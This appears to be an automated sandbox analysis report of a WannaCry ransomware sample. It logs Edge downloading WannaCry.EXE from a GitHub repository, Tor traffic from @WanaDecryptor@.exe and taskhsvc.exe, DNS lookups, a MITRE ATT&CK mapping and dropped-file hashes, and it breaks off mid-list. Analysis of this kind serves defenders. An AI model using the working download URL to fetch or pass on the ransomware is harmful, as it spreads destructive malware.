https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=7df04719-f4e8-42c7-861d-fa4dcca423a3&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%22125258D7D1334F6085405077EDD48B89%22%7d

tls, http2

msedge.exe

2.7kB
7.2kB
15
15

HTTP Request

GET https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=7df04719-f4e8-42c7-861d-fa4dcca423a3&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%22125258D7D1334F6085405077EDD48B89%22%7d

HTTP Response

200
20.26.156.215:443

https://github.com/limiteci/WannaCry/raw/refs/heads/main/WannaCry.EXE

tls, http2

msedge.exe

7.7kB
148.3kB
99
138

HTTP Request

GET https://github.com/limiteci/WannaCry

HTTP Response

200

HTTP Request

GET https://github.com/limiteci/WannaCry/sponsor_button

HTTP Request

GET https://github.com/limiteci/WannaCry/security/overall-count

HTTP Request

GET https://github.com/limiteci/WannaCry/hovercards/citation/sidebar_partial?tree_name=main

HTTP Request

GET https://github.com/limiteci/WannaCry/sponsors_list?block_button=false&current_repository=WannaCry

HTTP Request

GET https://github.com/limiteci/WannaCry/used_by_list

HTTP Request

GET https://github.com/limiteci/WannaCry/latest-commit/main

HTTP Request

GET https://github.com/limiteci/WannaCry/refs?type=branch

HTTP Request

GET https://github.com/limiteci/WannaCry/tree-commit-info/main

HTTP Request

GET https://github.com/limiteci/WannaCry/overview-files/main

HTTP Request

GET https://github.com/limiteci/WannaCry/branch-and-tag-count

HTTP Response

204

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.com/manifest.json

HTTP Response

200

HTTP Request

GET https://github.com/limiteci/WannaCry/funding_links?fragment=1

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.com/limiteci/WannaCry/blob/main/WannaCry.EXE?raw=true

HTTP Response

302

HTTP Request

GET https://github.com/limiteci/WannaCry/raw/refs/heads/main/WannaCry.EXE

HTTP Response

302

HTTP Request

GET https://github.com/limiteci/WannaCry/blob/main/WannaCry.EXE?raw=true

HTTP Response

302

HTTP Request

GET https://github.com/limiteci/WannaCry/raw/refs/heads/main/WannaCry.EXE

HTTP Response

302
20.26.156.215:443

github.com

tls

msedge.exe

1.1kB
4.0kB
11
8
185.199.110.133:443

https://raw.githubusercontent.com/limiteci/WannaCry/refs/heads/main/WannaCry.EXE

tls, http2

msedge.exe

87.1kB
3.6MB
1658
2618

HTTP Request

GET https://avatars.githubusercontent.com/u/70485500?v=4&size=40

HTTP Response

200

HTTP Request

GET https://raw.githubusercontent.com/limiteci/WannaCry/refs/heads/main/WannaCry.EXE

HTTP Response

200
185.199.111.154:443

github.githubassets.com

tls

msedge.exe

989 B
6.3kB
9
11
185.199.111.154:443

https://github.githubassets.com/assets/chunk-ui_packages_show-dialog-on-load-element_show-dialog-on-load-element_ts-eea3fdb40121.js

tls, http2

msedge.exe

38.5kB
1.0MB
601
837

HTTP Request

GET https://github.githubassets.com/assets/light-3e154969b9f9.css

HTTP Request

GET https://github.githubassets.com/assets/dark-9c5b7a476542.css

HTTP Request

GET https://github.githubassets.com/assets/primer-primitives-4cf0d59ab51a.css

HTTP Request

GET https://github.githubassets.com/assets/primer-fefb1a332c28.css

HTTP Request

GET https://github.githubassets.com/assets/global-dfacc4e45ec5.css

HTTP Request

GET https://github.githubassets.com/assets/github-d1e3b63864f7.css

HTTP Request

GET https://github.githubassets.com/assets/primer-react.ed72bee494c072c5b54c.module.css

HTTP Request

GET https://github.githubassets.com/assets/notifications-subscriptions-menu.1bcff9205c241e99cff2.module.css

HTTP Request

GET https://github.githubassets.com/assets/repos-overview.47b2222c697daf78496d.module.css

HTTP Request

GET https://github.githubassets.com/assets/repository-0f7cf89e325a.css

HTTP Request

GET https://github.githubassets.com/assets/code-59de543ca292.css

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/wp-runtime-ccaf3a5ac52a.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-b73fdff77a4e.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-aff936e590ed.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-247092-76666ec8c39f.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-7c0fc5bf86b7.js

HTTP Request

GET https://github.githubassets.com/assets/environment-4b64a58433d1.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-4aa4b0e95669.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-6d3967acd51c.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_g-emoji-element_di-6ce195-53781cbc550f.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_js-f5498b8d4e5d.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-a164c5ea9f62.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-d1a841-8f251a0656e7.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f4b251-f7c3b6081b19.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-1f651a-0cff18664748.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-21f158-6ce6e035e87d.js

HTTP Request

GET https://github.githubassets.com/assets/github-elements-073f7c54c837.js

HTTP Request

GET https://github.githubassets.com/assets/element-registry-b70a6fd78218.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_primer_live-region-element_dis-037ad60-8582b70cd5a9.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-bb80ec-634de60bacfa.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-ce7225a304c5.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-f3aee1-e6893db9c19e.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-f8a5485c982a.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-858e043fcf76.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_esm_js-node_modules_stacktrace-pa-a71630-67856ad29bae.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-9a8cd2-373766bf71f1.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-695178a346e3.js

HTTP Request

GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-b94fd01cd2b1.js

HTTP Request

GET https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-112600808cf9.js

HTTP Request

GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-d0d0a6-579c1a5c7bf0.js

HTTP Request

GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-aeae6fcdf371.js

HTTP Request

GET https://github.githubassets.com/assets/behaviors-82ff75c964f1.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-bf7e5a3732fd.js

HTTP Request

GET https://github.githubassets.com/assets/notifications-global-54f34167118d.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-96453a51f920.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-e53a3f-96e856171702.js

HTTP Request

GET https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-00df584d9e79.js

HTTP Request

GET https://github.githubassets.com/assets/codespaces-98a04584b02d.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-cdab1b-03eba6ef6933.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_delegated-events_di-e161aa-a6774a3bb897.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_remote--b0e14d-dac8f7484f9f.js

HTTP Request

GET https://github.githubassets.com/assets/repositories-8e899871191b.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_catalyst_lib_inde-dbbea9-e73b311a14f1.js

HTTP Request

GET https://github.githubassets.com/assets/code-menu-045752d47d8a.js

HTTP Request

GET https://github.githubassets.com/assets/primer-react-65b92279806c.js

HTTP Request

GET https://github.githubassets.com/assets/react-core-0fac99d367d3.js

HTTP Request

GET https://github.githubassets.com/assets/react-lib-7b7b5264f6c1.js

HTTP Request

GET https://github.githubassets.com/assets/octicons-react-45c3a19dd792.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_emotion_is-prop-valid_dist_emotion-is-prop-valid_esm_js-node_modules_emo-41da55-1851acd376ff.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover-fn_js-4896ddd4b7bb.js

HTTP Request

GET https://github.githubassets.com/assets/notifications-subscriptions-menu-e42e1b53054c.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hotkey_dist_index_js-no-d67c7f-bd7d077cdcb1.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_ui-commands_ui-commands_ts-d25fac54a6bc.js

HTTP Request

GET https://github.githubassets.com/assets/keyboard-shortcuts-dialog-a549d5821edb.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-9a621ecbf672.js

HTTP Request

GET https://github.githubassets.com/assets/sessions-b83865e93139.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_tanstack_query-core_build_modern_query_js-node_modules_tanstack_react-qu-e4a133-25f9fad0b763.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_tanstack_query-core_build_modern_queryObserver_js-node_modules_tanstack_-defd52-7aa5ebad499a.js

HTTP Request

GET https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-d56e55-4533ead6a048.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_aria-live_aria-live_ts-ui_packages_promise-with-resolvers-polyfill_promise-with-r-014121-ce989b6c1293.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_paths_index_ts-dce6cc95a312.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_ref-selector_RefSelector_tsx-8345f53a5ea1.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_verified-fetch_verified-fetch_ts-ui_packages_code-view-shared_components_SharedMa-058d4a-ede90624198e.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_code-view-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_hooks-2170c0-9e46edbb5acf.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-012d79-23be1e3cb034.js

HTTP Request

GET https://github.githubassets.com/assets/repos-overview-d08f97d0e1ca.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/chunk-app_components_primer_experimental_select-panel-element_ts-90c1b002fec5.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-1077a1578034.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_stack-tra-a18fad-93afc0ffc78f.js

HTTP Request

GET https://github.githubassets.com/assets/ui_packages_query-builder-element_query-builder-element_ts-1546dc8c42cb.js

HTTP Request

GET https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-ui_packages_code-nav_code-nav_ts-ui_packages_filter--8253c1-0101b49b9f00.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-app_components_search_qbsearch-input-element_ts-ui_packages_trusted-types-policies_policy_ts--7cc11e-123cbdba07d7.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-link-element_cookie-consent-link-element_ts-23c1cb96287b.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-ui_packages_ghcc-consent-element_ghcc-consent-element_ts-2ab85b7d16d5.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_stack-tra-600f89-049e7dac85f6.js

HTTP Request

GET https://github.githubassets.com/assets/chunk-ui_packages_webauthn-get-element_webauthn-get-element_ts-eba7ee3409f2.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/chunk-ui_packages_code-view-shared_components_files-search_FileResultsList_tsx-71c1ca2bf425.js

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-d06d275cbddc.js

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/assets/chunk-ui_packages_show-dialog-on-load-element_show-dialog-on-load-element_ts-eea3fdb40121.js

HTTP Response

200
185.199.111.154:443

github.githubassets.com

tls

msedge.exe

989 B
6.3kB
9
11
185.199.111.154:443

github.githubassets.com

tls

msedge.exe

989 B
6.3kB
9
11
185.199.111.154:443

github.githubassets.com

tls

msedge.exe

989 B
6.3kB
9
11
185.199.111.154:443

github.githubassets.com

tls

msedge.exe

989 B
6.3kB
9
11
185.199.111.133:443

https://camo.githubusercontent.com/23b6c2b3787caef9c6d3766ccd509ed433ae8532885416fdaeb4a74045b5fe47/68747470733a2f2f7777772e6865616c74686361726569746e6577732e636f6d2f73697465732f6869746e2f66696c65732f57616e6e614372792d6c6f636b73637265656e3731325f302e706e67

tls, http2

msedge.exe

7.6kB
314.7kB
139
236

HTTP Request

GET https://camo.githubusercontent.com/23b6c2b3787caef9c6d3766ccd509ed433ae8532885416fdaeb4a74045b5fe47/68747470733a2f2f7777772e6865616c74686361726569746e6577732e636f6d2f73697465732f6869746e2f66696c65732f57616e6e614372792d6c6f636b73637265656e3731325f302e706e67

HTTP Response

200
185.199.111.154:443

https://github.githubassets.com/favicons/favicon.png

tls, http2

msedge.exe

2.5kB
24.6kB
28
31

HTTP Request

GET https://github.githubassets.com/favicons/favicon.svg

HTTP Request

GET https://github.githubassets.com/assets/apple-touch-icon-144x144-b882e354c005.png

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://github.githubassets.com/favicons/favicon.png

HTTP Response

200
140.82.112.22:443

https://collector.github.com/github/collect

tls, http2

msedge.exe

9.9kB
8.2kB
35
29

HTTP Request

POST https://collector.github.com/github/collect

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204

HTTP Response

204

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204

HTTP Request

POST https://collector.github.com/github/collect

HTTP Response

204
140.82.112.22:443

collector.github.com

msedge.exe

98 B
52 B
2
1
20.26.156.210:443

https://api.github.com/_private/browser/stats

tls, http2

msedge.exe

9.5kB
8.0kB
27
29

HTTP Request

POST https://api.github.com/_private/browser/stats

HTTP Response

200

HTTP Request

POST https://api.github.com/_private/browser/stats

HTTP Response

200

HTTP Request

POST https://api.github.com/_private/browser/stats

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/limiteci/WannaCry/refs/heads/main/WannaCry.EXE

tls, http2

msedge.exe

3.7kB
63.5kB
55
57

HTTP Request

OPTIONS https://raw.githubusercontent.com/limiteci/WannaCry/refs/heads/main/WannaCry.EXE

HTTP Response

403
127.0.0.1:9050

@WanaDecryptor@.exe
85.235.250.88:443

taskhsvc.exe

260 B
5
86.59.21.38:443

taskhsvc.exe

260 B
5
127.0.0.1:52100

taskhsvc.exe
107.170.101.39:443

taskhsvc.exe

260 B
5
107.170.101.39:443

taskhsvc.exe

260 B
5
134.119.3.164:9001

taskhsvc.exe

260 B
5
154.35.175.225:443

taskhsvc.exe

260 B
5
52.109.89.19:443

https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

tls, http

WINWORD.EXE

1.7kB
9.1kB
11
11

HTTP Request

POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

HTTP Response

200
127.0.0.1:9050

@WanaDecryptor@.exe
127.0.0.1:9050

@WanaDecryptor@.exe
154.35.175.225:443

taskhsvc.exe

260 B
5
91.121.84.137:4051

taskhsvc.exe

260 B
5
127.0.0.1:9050

@WanaDecryptor@.exe
194.109.206.212:443

taskhsvc.exe

156 B
3
104.86.110.96:443

www.bing.com

tls

12.0kB
153.7kB
139
128
92.123.128.136:443

r.bing.com

tls

1.1kB
5.1kB
14
11
92.123.128.136:443

r.bing.com

tls

1.2kB
5.1kB
15
11
92.123.128.136:443

r.bing.com

tls

1.1kB
5.1kB
14
11
92.123.128.136:443

r.bing.com

tls

1.1kB
5.1kB
14
11
92.123.128.136:443

r.bing.com

tls

67.9kB
1.6MB
1215
1193
92.123.128.136:443

r.bing.com

tls

1.1kB
5.1kB
14
11
127.0.0.1:9050

@WanaDecryptor@.exe

8.8.8.8:53

google.com

dns

msedge.exe

56 B
72 B
1
1

DNS Request

google.com

DNS Response

172.217.169.78
8.8.8.8:53

google.com

dns

msedge.exe

56 B
72 B
1
1

DNS Request

google.com

DNS Response

142.250.179.238
8.8.8.8:53

136.32.126.40.in-addr.arpa

dns

1.4kB
4.2kB
21
21

DNS Request

136.32.126.40.in-addr.arpa

DNS Request

240.221.184.93.in-addr.arpa

DNS Request

www.bing.com

DNS Response

92.123.128.172

92.123.128.174

92.123.128.178

92.123.128.176

92.123.128.177

92.123.128.182

92.123.128.175

92.123.128.181

92.123.128.173

DNS Request

www.bing.com

DNS Response

92.123.128.194

92.123.128.132

92.123.128.195

92.123.128.192

92.123.128.135

92.123.128.191

92.123.128.190

92.123.128.133

92.123.128.134

DNS Request

th.bing.com

DNS Response

92.123.128.178

92.123.128.177

92.123.128.183

92.123.128.187

92.123.128.174

92.123.128.185

92.123.128.182

92.123.128.176

92.123.128.175

DNS Request

178.128.123.92.in-addr.arpa

DNS Request

login.microsoftonline.com

DNS Response

40.126.32.138

40.126.32.74

20.190.160.22

40.126.32.133

40.126.32.136

20.190.160.17

20.190.160.20

40.126.32.134

DNS Request

login.live.com

DNS Response

40.126.32.134

20.190.160.20

40.126.32.68

40.126.32.136

20.190.160.14

40.126.32.72

20.190.160.17

20.190.160.22

DNS Request

www2.bing.com

DNS Response

204.79.197.200

13.107.21.200

DNS Request

nexusrules.officeapps.live.com

DNS Response

52.111.243.30

DNS Request

github.com

DNS Response

20.26.156.215

DNS Request

avatars.githubusercontent.com

DNS Response

185.199.110.133

185.199.109.133

185.199.108.133

185.199.111.133

DNS Request

github-cloud.s3.amazonaws.com

DNS Response

52.217.172.177

3.5.24.80

3.5.27.248

16.15.216.154

54.231.163.241

52.216.141.196

52.217.73.4

54.231.165.209

DNS Request

133.110.199.185.in-addr.arpa

DNS Request

collector.github.com

DNS Response

140.82.112.22

DNS Request

210.156.26.20.in-addr.arpa

DNS Request

officeclient.microsoft.com

DNS Response

52.109.76.240

DNS Request

roaming.officeapps.live.com

DNS Response

52.109.89.19

DNS Request

27.178.89.13.in-addr.arpa

DNS Request

ocsp.digicert.com

DNS Response

192.229.221.95

DNS Request

fp.msedge.net

DNS Response

204.79.197.222
224.0.0.251:5353

msedge.exe

463 B
7
8.8.8.8:53

user-images.githubusercontent.com

dns

msedge.exe

627 B
1.5kB
9
9

DNS Request

user-images.githubusercontent.com

DNS Response

185.199.111.133

185.199.108.133

185.199.109.133

185.199.110.133

DNS Request

133.111.199.185.in-addr.arpa

DNS Request

api.github.com

DNS Response

20.26.156.210

DNS Request

raw.githubusercontent.com

DNS Response

185.199.110.133

185.199.108.133

185.199.111.133

185.199.109.133

DNS Request

config.edge.skype.com

DNS Response

13.107.42.16

DNS Request

19.89.109.52.in-addr.arpa

DNS Request

self.events.data.microsoft.com

DNS Response

52.178.17.3

DNS Request

r.bing.com

DNS Response

92.123.128.136

92.123.128.140

92.123.128.144

92.123.128.141

92.123.128.146

92.123.128.138

92.123.128.134

92.123.128.137

92.123.128.135

DNS Request

222.197.79.204.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d30a5618854b9da7bcfc03aeb0a594c4

SHA1
7f37105d7e5b1ecb270726915956c2271116eab7

SHA256
3494c446aa3cb038f1d920b26910b7fe1f4286db78cb3f203ad02cb93889c1a8

SHA512
efd488fcd1729017a596ddd2950bff07d5a11140cba56ff8e0c62ef62827b35c22857bc4f5f5ea11ccc2e1394c0b3ee8651df62a25e66710f320e7a2cf4d1a77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
03a56f81ee69dd9727832df26709a1c9

SHA1
ab6754cc9ebd922ef3c37b7e84ff20e250cfde3b

SHA256
65d97e83b315d9140f3922b278d08352809f955e2a714fedfaea6283a5300e53

SHA512
e9915f11e74c1bcf7f80d1bcdc8175df820af30f223a17c0fe11b6808e5a400550dcbe59b64346b7741c7c77735abefaf2c988753e11d086000522a05a0f7781

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
70KB

MD5
4308671e9d218f479c8810d2c04ea6c6

SHA1
dd3686818bc62f93c6ab0190ed611031f97fdfcf

SHA256
5addbdd4fe74ff8afc4ca92f35eb60778af623e4f8b5911323ab58a9beed6a9a

SHA512
5936b6465140968acb7ad7f7486c50980081482766002c35d493f0bdd1cc648712eebf30225b6b7e29f6f3123458451d71e62d9328f7e0d9889028bff66e2ad2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
62KB

MD5
c3c0eb5e044497577bec91b5970f6d30

SHA1
d833f81cf21f68d43ba64a6c28892945adc317a6

SHA256
eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb

SHA512
83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
19KB

MD5
76a3f1e9a452564e0f8dce6c0ee111e8

SHA1
11c3d925cbc1a52d53584fd8606f8f713aa59114

SHA256
381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c

SHA512
a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
65KB

MD5
56d57bc655526551f217536f19195495

SHA1
28b430886d1220855a805d78dc5d6414aeee6995

SHA256
f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4

SHA512
7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
b402319928fc2bc17b4d12f63777e6a4

SHA1
389f6b118568c01e60f1b9da81ff97a097aff118

SHA256
d7efc9d614764b28059e79f3a4d11b43b6fcb796de2b4565b6bb974fde258122

SHA512
57714b5eb418388e195b165e8641f55026658702ffaee6b2c639cd322e2d218fd6951139884e7a6efd40825cadd532d7a6e5510c0b1e61c6d54f7dc6f65890d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
e314c9825bd53d545766e2b48d2ddc48

SHA1
5902ca73197e666448c6491098512db6fcb3c246

SHA256
f0036881de1f7499885ca988688474fc83bb219dddc492c02a6bbd3c42abb654

SHA512
961b3f0a035bea0c4ed46680602498af3ad6d6dee530bace77949ec2922b6e9bf56db62962f28dc4ba6d0580c84de1845976378a88b141aadaab23c0ba0674b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
941B

MD5
53bc77068dd2a364a59f5efccf558274

SHA1
965478a8f357dea7f538f9951ce7c11b7dff57cd

SHA256
324d6c98c9c5e98b0883d9f413bc02cef225e52a2b904eb1de2794b8287fa5ce

SHA512
2f6d337da0cad9f4aa1abee8b965254ad5814da64a6550cc72fae143aa6b2d6252c520bfcbecc4dc5eb52bbc3b165e0746e446cc06515822461f2ce5fe0f203b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1024B

MD5
18447d8b8e917f8201335fd624e2b8fc

SHA1
99bd292b62a08c591447fb76aef92b5f5497ffb1

SHA256
29b2ee1292029905540aa2baa59b9ef436c45fc9b79d0e50b54d220078882ef4

SHA512
